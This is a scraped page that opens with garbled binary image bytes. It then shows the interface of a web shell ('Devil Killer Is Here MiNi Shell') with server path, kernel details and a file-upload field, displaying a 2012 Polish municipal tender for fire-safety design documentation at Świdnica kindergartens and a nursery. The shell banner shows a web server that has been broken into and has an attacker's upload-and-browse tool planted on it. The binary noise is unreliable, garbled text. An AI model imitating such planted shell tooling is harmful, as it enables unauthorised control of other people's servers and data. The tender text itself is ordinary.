JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120716/253688-N-2012.html

<p class="kh_header"><b>Świdnica: Wykonanie dokumentacji projektowych i kosztorysowych dla zadania pn.: przebudowy budynków miejskich jednostek w zakresie dostosowania ich do wymagań bezpieczeństwa pożarowego</b><br>
<b>Numer ogłoszenia: 253688 - 2012; data zamieszczenia: 16.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych i kosztorysowych dla zadania pn.: przebudowy budynków miejskich jednostek w zakresie dostosowania ich do wymagań bezpieczeństwa pożarowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy opracowania dokumentacji projektowych i kosztorysowych wskazujących rozwiązania zapewniające bezpieczeństwo pożarowe w następujących miejskich jednostkach: 
ZADANIE nr 1: Przedszkole Miejskie nr 1, pl. św. Małgorzaty 15 w Świdnicy, tel. 74 852 16 19;
ZADANIE nr 2: Przedszkole Miejskie nr 4, ul. Lelewela 10 w Świdnicy, tel. 74 852 03 97;
ZADANIE nr 3: Przedszkole Miejskie nr 14, ul. M. Kozara - Słobódzkiego 10 w Świdnicy, tel. 74 852 17 42;
ZADANIE nr 4: Przedszkole Miejskie nr 15, ul. Ofiar Oświęcimskich 45 w Świdnicy, tel. 74 852 43 53;
ZADANIE nr 5: Przedszkole Miejskie nr 16, ul. Marcinkowskiego 10 w Świdnicy, tel. 74 852 60 70;
ZADANIE nr 6: Żłobek Miejski nr 1, ul. M. Kozara - Słobódzkiego 26 w Świdnicy, tel. 74 640 86 30.

3.2.	Przedmiot zamówienia 
3.2.1. Przedmiotem zamówienia jest opracowanie: a) kompletnych i pełnobranżowych dokumentacji projektowych: projektów budowlanych wraz z wykonawczymi, przedmiarów robót, b) specyfikacji technicznych wykonania i odbioru robót, c) kosztorysów inwestorskich, d) wszelkich niezbędnych ekspertyz, opinii oraz uzyskanie uzgodnień, pozwoleń wraz z uzyskaniem w imieniu Zamawiającego pozwolenia na budowę-zgłoszenia robót dla ZADAŃ wymienionych w pkt 3.1. pn.: Przebudowy budynków miejskich jednostek w zakresie dostosowania ich do wymagań bezpieczeństwa pożarowego. 
Zakres przebudowy należy ustalić w taki sposób, aby zrealizowane zostały nakazy Komendanta Powiatowego Państwowej Straży Pożarnej w Świdnicy. 
3.2.2. Przed podjęciem prac projektowych i opracowaniem dokumentacji budowlanych, o których mowa w pkt 3.2.1. Wykonawca sporządzi:
- wstępne założenia przyjętych rozwiązań budowlanych, które uzgodni z Zamawiającym,
- ekspertyzy techniczne rzeczoznawcy ds. zabezpieczeń przeciwpożarowych i rzeczoznawcy budowlanego, umożliwiające spełnianie wymagań bezpieczeństwa pożarowego i uzyska zgodę Komendanta Wojewódzkiego Państwowej Straży Pożarnej na spełnianie tych wymagań w zaproponowany sposób. 
3.2.3. Ww. komplet dokumentacji należy przygotować odrębnie dla każdej z jednostek wymienionych w pkt 3.1. 
3.2.4. ZAMAWIAJĄCY DOPUSZCZA SKŁADANIE OFERT CZĘŚCIOWYCH. 
3.2.5. Wykonawca może składać ofertę na wykonanie jednego, kilku lub wszystkich spośród ZADAŃ wymienionych w pkt 3.1.
3.2.6. Komendant Powiatowy Państwowej Straży Pożarnej w Świdnicy decyzjami nakazał Miastu wykonanie następujących obowiązków: 
1) w Przedszkolu Miejskim nr 1, pl. św. Małgorzaty 15 w Świdnicy, tel. 74 852 16 19 - ZADANIE nr 1:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatki schodowej,
b) zapewnić wymaganą przepisami techniczno-budowlanymi długość dojścia ewakuacyjnego w obiekcie,
c) zapewnić w budynku punkty poboru wody do celów przeciwpożarowych - hydranty wewnętrzne 25 z wężem półsztywnym;
Zamawiający posiada ekspertyzę techniczną dot. budynku Przedszkola Miejskiego nr 1 z zakresu ochrony przeciwpożarowej oraz Postanowienie Dolnośląskiego Komendanta Wojewódzkiego Państwowej Straży Pożarnej we Wrocławiu w sprawie wyrażenia zgody na spełnienie wymagań w zakresie bezpieczeństwa pożarowego. 
2) w Przedszkolu Miejskim nr 4, ul. Lelewela 10 w Świdnicy, tel. 74 852 03 97 - ZADANIE nr 2:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić wymaganą przepisami techniczno-budowlanymi długość dojścia ewakuacyjnego w obiekcie,
c) zapewnić w budynku punkty poboru wody do celów przeciwpożarowych - hydranty wewnętrzne 25 z wężem półsztywnym;
3) w Przedszkolu Miejskim nr 14, ul. M. Kozara-Słobódzkiego 10 w Świdnicy, tel. 74 852 17 42 - ZADANIE nr 3:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych,
c) zapewnić wymaganą przepisami techniczno-budowlanymi szerokość poziomych dróg ewakuacyjnych.
4) w Przedszkolu Miejskim nr 15, ul. Ofiar Oświęcimskich 45 w Świdnicy, tel. 74 852 43 53 - ZADANIE nr 4:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych.
5) w Przedszkolu Miejskim nr 16, ul. Marcinkowskiego 10 w Świdnicy, tel. 74 852 60 70 - ZADANIE nr 5:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych;

6) w Żłobku Miejskim nr 1, ul. M. Kozara-Słobódzkiego 26 w Świdnicy, tel. 74 640 86 30 - ZADANIE nr 6:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych.
3.2.7. Dokumentacja stanowiąca przedmiot zamówienia obejmuje wykonanie:
a)	ekspertyz z zakresu p.poż. oraz odpowiednich dla każdego z ZADAŃ wymienionych w pkt 3.1. projektów budowlanych wraz z wykonawczymi spośród branż: architektonicznej, konstrukcyjnej, instalacji sanitarnych i elektrycznych oraz wszelkich koniecznych dla realizacji nakazów KPPSP w Świdnicy, określonych w pkt od 3.2.1. do 3.2.6.;
b)	kosztorysów inwestorskich i przedmiarów z podziałem na branże oraz zbiorczych zestawień kosztów obejmujących wszystkie branże wchodzące w zakres przedmiotu zamówienia zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysów (.) (Dz. U. 2004. nr 130 poz. 1389);
c)	specyfikacji technicznych wykonania i odbioru robót, opracowanych zgodnie z §12, 13 i 14 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.);
3.2.8. Wykonawca zapewni pełnienie nadzoru autorskiego, o ile realizacja prac budowlanych wykonywanych na podstawie dokumentacji będącej przedmiotem zamówienia rozpocznie się przed upływem 3 lat od daty uzyskania pozwolenia na budowę, w zakresie:
- opisanym w art. 20 ust.1, pkt 4 z ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.),
- podawania rozwiązań zamiennych lub uzupełniających, które stały się wymagalne w czasie realizacji robót budowlanych w wyniku zmiany norm i przepisów szczególnych w okresie od daty wydania pozwolenia na budowę do dnia realizacji tych robót,
- udziału w naradach technicznych organizowanych przez Zamawiającego lub Wykonawcę robót budowlanych, we wskazanym miejscu i terminie, które stały się konieczne ze względu na wystąpienie okoliczności, których nie można było przewidzieć,
- udziału, po pisemnym powiadomieniu przez Zamawiającego, w odbiorach końcowych wykonanych robót budowlanych.
Ponadto Wykonawca:
- w przypadku zakwestionowania opracowanej dokumentacji przez właściwy organ do wydania pozwolenia na budowę - dokona uzupełnień w wyznaczonym przez organ terminie,
- w sytuacjach tego wymagających, będzie udzielał stosownych wyjaśnień oraz dokonywał zmian i uaktualnień w toku postępowania o udzielenie zamówienia na wybór Wykonawcy robót budowlanych, odnośnie wszelkich wątpliwości powstałych na tle przyjętych rozwiązań projektowych, będących przedmiotem opracowania, o którym mowa powyżej,
- dokona aktualizacji kosztorysów inwestorskich przed ogłoszeniem przetargu na realizację prac budowlanych.
3.2.9. Przedmiot zamówienia został szczegółowo określony w Części II niniejszego SIWZ - Opis Przedmiotu Zamówienia.
3.2.10. Przedmiot zamówienia będzie realizowany zgodnie z postanowieniami i na warunkach określonych w projekcie umowy stanowiącym załącznik B do SIWZ.
1.   Zakres przedmiotu zamówienia
Przedmiotem zamówienia jest opracowanie pełnobranżowych projektów budowlanych wraz z wykonawczymi (zgodnie z Rozporządzeniem Ministra Infrastruktury z 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego Dz.U.03.120.1133 z późn. zm.) w zakresie uwzględniającym specyfikę robót budowlanych oraz uzyskanie pozwolenia na budowę/zgłoszenie robót.
1.1.	Wykaz opracowań projektowych:
Ekspertyzy z zakresu p.poż. oraz odpowiednio dla każdego z ZADAŃ wymienionych w pkt 3.1. części I SIWZ projekty budowlane wraz z wykonawczymi spośród branż: architektonicznej, konstrukcyjnej, instalacji sanitarnych i elektrycznych oraz wszelkich koniecznych dla realizacji nakazów KPPSP w Świdnicy, określonych w pkt od 3.2.1. do 3.2.6.
1.2.	Przed podjęciem prac projektowych, o których mowa w pkt 3.2.1. część I SIWZ Wykonawca:
- sporządzi wstępne założenia przyjętych rozwiązań budowlanych, które uzgodni z Zamawiającym,
- sporządzi ekspertyzy techniczne rzeczoznawcy ds. zabezpieczeń przeciwpożarowych i rzeczoznawcy budowlanego, umożliwiające spełnianie wymagań bezpieczeństwa pożarowego i uzyska zgodę Komendanta Wojewódzkiego Państwowej Straży Pożarnej na spełnianie tych wymagań w zaproponowany sposób.
1.3. Kosztorysy inwestorskie i przedmiary z podziałem na branże, zbiorcze zestawienie kosztów obejmujące wszystkie branże wchodzące w zakres przedmiotu zamówienia, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysów (.) (Dz. U. z 2004. nr 130, poz. 1389).
1.4. Specyfikacje techniczne wykonania i odbioru robót, opracowane zgodnie z §12, 13 i 14 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U.2004.202.2072 z późn. zm.).

UWAGA
Wszystkie ww części dokumentacji muszą tworzyć powiązaną ze sobą całość tak, by łącznie stanowiły kompleksowe opracowanie projektowe i kosztorysowe dla zadania pn.: Przebudowa budynku Przedszkola /Żłobka Miejskiego nr . ., ul. .w Świdnicy, w zakresie dostosowania do wymogów bezpieczeństwa pożarowego.

1.5. Wykaz prac niezbędnych do wykonania kompletnej dokumentacji projektowej
1.5.1. Sporządzenie wniosku o wydanie decyzji o pozwoleniu na budowę obejmującego wszystkie, niezbędne, wymagane prawem dane o inwestycji i załączniki oraz uzyskanie na podstawie złożonego wniosku decyzji o pozwoleniu na budowę lub, w przypadkach prawem przewidzianym, sporządzenie innych dokumentów i złożenie ich w Starostwie Powiatowym, zezwalających Zamawiającemu na prowadzenie robót budowlanych w oparciu o wykonane dokumentacje projektowe - zgłoszenie robót.
1.5.2. Uzyskanie wszelkich innych decyzji, uzgodnień i opinii niezbędnych do uzyskania pozwolenia na budowę-zgłoszenia robót oraz danych i materiałów wyjściowych do projektowania, w tym mapy do celów projektowych.
Projekty branżowe muszą mieć komplet odrębnych uzgodnień z administratorami infrastruktury technicznej oraz komplet uzgodnień międzybranżowych projektantów.
Inne prace niezbędne do kompleksowego wykonania całości zadania stanowiące koszt Wykonawcy, w tym występowanie w imieniu Zamawiającego o uzgodnienia, zapewnienia, techniczne warunki przyłączenia, decyzje oraz zatwierdzenie przyjętych rozwiązań projektowych, a także, jeśli ich potrzeba wyniknie z dokumentacji uzgodnionej z innymi służbami.

2. Wykonawca ma obowiązek sprawowania nadzoru autorskiego
Wykonawca zapewni pełnienie nadzoru autorskiego, o ile realizacja prac budowlanych wykonywanych na podstawie dokumentacji będącej przedmiotem zamówienia rozpocznie się przed upływem 3 lat od daty uzyskania pozwolenia na budowę/zgłoszenie robót, w zakresie:
- opisanym w art. 20 ust.1, pkt 4 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.),
- podawania rozwiązań zamiennych lub uzupełniających, które stały się wymagalne w czasie realizacji robót budowlanych w wyniku zmiany norm i przepisów szczególnych w okresie od daty wydania pozwolenia na budowę do dnia realizacji tych robót,
- udziału w naradach technicznych organizowanych przez Zamawiającego lub Wykonawcę robót budowlanych, we wskazanym miejscu i terminie, które stały się konieczne ze względu na wystąpienie okoliczności, których nie można było przewidzieć,
- udziału, po pisemnym powiadomieniu przez Zamawiającego, w odbiorach końcowych wykonanych robót budowlanych.
Ponadto Wykonawca:
- w przypadku zakwestionowania opracowanej dokumentacji przez właściwy organ do wydania pozwolenia na budowę - dokona uzupełnień w wyznaczonym przez organ terminie,
- w sytuacjach tego wymagających, będzie udzielał stosownych wyjaśnień oraz dokonywał zmian i uaktualnień w toku postępowania o udzielenie zamówienia na wybór Wykonawcy robót budowlanych, odnośnie wszelkich wątpliwości powstałych na tle przyjętych rozwiązań projektowych, będących przedmiotem opracowania, o którym mowa powyżej,
- dokona aktualizacji kosztorysów inwestorskich przed ogłoszeniem przetargu na realizację prac budowlanych.
3.  Wymagania ogólne
3.1.1. Wykonawca odpowiada za zorganizowanie procesu wykonywania opracowań projektowych, w taki sposób aby założone cele projektu zostały osiągnięte zgodnie z umową.
3.1.2. Podstawowe obowiązki projektanta w zakresie odpowiedzialności zawodowej oraz wymagania dla projektowanych obiektów określa ustawa prawo budowlane oraz ustawa o samorządzie zawodowym.
3.1.3. Przedmiot zamówienia należy projektować zgodnie z przepisami, w tym techniczno-budowlanymi oraz zasadami wiedzy technicznej. 
3.1.4. Wykonawca zobowiązany jest znać wszystkie przepisy wydane przez władze centralne i lokalne oraz inne przepisy, regulaminy i wytyczne, które są w jakikolwiek sposób związane z wykonywanymi opracowaniami projektowymi i będzie w pełni odpowiedzialny za przestrzeganie ich postanowień podczas wykonywania opracowań projektowych.
3.1.5. Wykonawca będzie przestrzegać praw patentowych i będzie w pełni odpowiedzialny za wypełnienie wszelkich wymagań prawnych odnośnie znaków firmowych, nazw lub innych chronionych praw w odniesieniu do projektów, sprzętu, materiałów lub urządzeń użytych lub związanych z wykonywaniem opracowań projektowych. Wszelkie straty, koszty postępowania, obciążenia i wydatki wynikłe lub związane z naruszeniem jakichkolwiek praw patentowych przez Wykonawcę pokryje Wykonawca.
3.1.6. Wykonawca będzie odpowiadał za ochronę opracowań projektowych i materiałów wyjściowych wykonywanych i otrzymanych w trakcie prac projektowych do czasu ich przekazania Zamawiającemu.
3.1.7. Wykonawca będzie przechowywał przez okres co najmniej 5 lat od daty odbioru przewidzianego umową, egzemplarz archiwalny wszystkich wykonanych opracowań projektowych.

4.  Informacje dodatkowe dotyczące przedmiotu zamówienia 
4.1.	Każde opracowanie projektowe i kosztorysowe podlegać będzie odbiorowi ze strony Zamawiającego, a prawa autorskie do projektu przejdą na Zamawiającego na wszystkich polach eksploatacji.
Dokumentację opracować należy w wersji papierowej i w formie elektronicznej w powszechnie dostępnym formacie plików, a przedmiary robót i kosztorysy inwestorskie dodatkowo w plikach źródłowych. Zamawiający otrzyma do własnej dyspozycji opracowania projektowe w 4-ch drukowanych kompletach egzemplarzy (niezależnie od ilości egzemplarzy dokumentacji niezbędnej dla Instytucji opiniujących i uzgadniających), z wyjątkiem kosztorysów inwestorskich, przedmiarów robót i specyfikacji technicznych wykonania i odbioru robót, które zostaną przekazane Zamawiającemu w trzech papierowych egzemplarzach.
4.2.	Wersję elektroniczną dokumentacji projektowej i kosztorysowej należy wykonać w formacie umożliwiającym odczyt plików i ich wydruk, a mianowicie: 
- pliki tekstowe: rozszerzenie doc. i pdf.
- pliki graficzne: rozszerzenie dwg.lub dgn. i pdf.
- arkusze kalkulacyjne: rozszerzenie xls., ath. i pdf.
4.3.	Przedmiot zamówienia sporządzić należy zgodnie z niniejszą specyfikacją, prawem budowlanym, przepisami szczególnymi i obowiązującymi normami na dzień jej wykonania. Dokumentacja winna być kompletna z punktu widzenia celu, któremu ma służyć. Zamawiana niniejszym przetargiem dokumentacja i opracowania powinna umożliwić udzielenie zamówienia publicznego na wykonanie zaprojektowanych robót budowlanych i ich realizację.
4.4.	Przekazane Zamawiającemu opracowania projektowe i kosztowe muszą w sposób jednoznaczny opisywać roboty budowlane. Projekt, przedmiar, kosztorys inwestorski i specyfikacja techniczna wykonania i odbioru robót muszą być spójne i w sposób zgodny pod względem rodzajowym i ilościowym opisywać roboty budowlane w każdym z w/w opracowań. 
4.5.	Przekazana dokumentacja winna być opatrzona klauzulą, że jest opracowana zgodnie z obowiązującym prawem, w tym z przepisami techniczno-budowlanymi i że jest kompletna z punktu widzenia celu, któremu ma służyć.
4.6.	Zamawiający zastrzega sobie prawo do systematycznego wglądu do prac projektowych w trakcie ich wykonywania.

5.   Wymogi formalne jakie spełniać musi dokumentacja projektowa
Dokumentacja projektowa musi spełniać wymogi:
5.1.	Ustawy z dnia 7 lipca 1994r. Prawo Budowlane (Dz. U z 2010r. Nr 243, poz. 1623 z późn. zm.) i obowiązujących Polskich Norm;
5.2.	Ustawy z dnia 24.08.1991 r. o ochronie przeciwpożarowej (Dz. U. z 1991 r. Nr 81, poz. 351 z późn. zm.);
5.3.	Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75, poz. 690);
5.4.	Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. Nr 80, poz. 563);
5.5.	Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003r. Nr 120, poz. 1133);
5.6.	Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004r. Nr 130, poz. 1389);
5.7.	Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. (Dz. U. z 2004r. Nr 202 poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (przedmiar robót i specyfikacje techniczne).
6.   Informacje dodatkowe dotyczące zakresu dokumentacji projektowej
6.1. Projekt budowlany powinien zawierać w szczególności:
a)	część opisowo - rysunkową,
b)	komplet wymaganych przepisami szczególnymi uzgodnień, pozwoleń i opinii,
c)	kserokopię uprawnień projektanta i sprawdzającego oraz kopię dokumentu o przynależności do izby samorządu zawodowego inżynierów budownictwa, 
d)	plan i informację dotyczącą bezpieczeństwa i ochrony zdrowia, 
e)	oświadczenie projektanta i sprawdzającego o sporządzeniu projektu budowlanego zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej.

-	Wszystkie kopie muszą zawierać poświadczenie za zgodność z oryginałem i być podpisane przez projektanta z pieczątką na każdej stronie; 
-	Projekty powinny być oprawione w sposób uniemożliwiający zdekompletowanie.

6.2. Projekt wykonawczy powinien uzupełniać i uszczegóławiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizacji robót budowlanych.

6.3. Przedmiar robót do opracowania kosztorysu ofertowego
Przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz ze szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych.
Ilości jednostek miary podane w przedmiarze powinny być wyliczone na podstawie rysunków w dokumentacji projektowej, wyłącznie w sposób zgodny z zasadami podanymi w specyfikacjach technicznych wykonania i odbioru robót budowlanych.

6.4. Kosztorys inwestorski 
Podstawę do sporządzania kosztorysu inwestorskiego stanowią:
a)	dokumentacja projektowa;
b)	specyfikacja techniczna wykonania i odbioru robót budowlanych;
c)	założenia wyjściowe do kosztorysowania;
d)	ceny jednostkowe robót podstawowych.

Kosztorys inwestorski obejmuje:	
a)	stronę tytułową,
b)	ogólną charakterystykę obiektu lub robót, zawierającą krótki opis techniczny wraz z istotnymi parametrami, które określają wielkość obiektu lub robót;
c)	przedmiar robót;
d)	kalkulację uproszczoną;
e)	tabelę wartości elementów scalonych, sporządzoną w postaci sumarycznego zestawienia wartości robót określonych przedmiarem robót, łącznie z narzutami kosztów pośrednich i zysku, odniesionych do elementu obiektu lub zbiorczych rodzajów robót;
f)	załączniki:
g)	założenia wyjściowe do kosztorysowania,
h)	kalkulacje szczegółowe cen jednostkowych, analizy indywidualne nakładów rzeczowych oraz analizy własne cen czynników produkcji i wskaźników narzutów kosztów pośrednich i zysku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
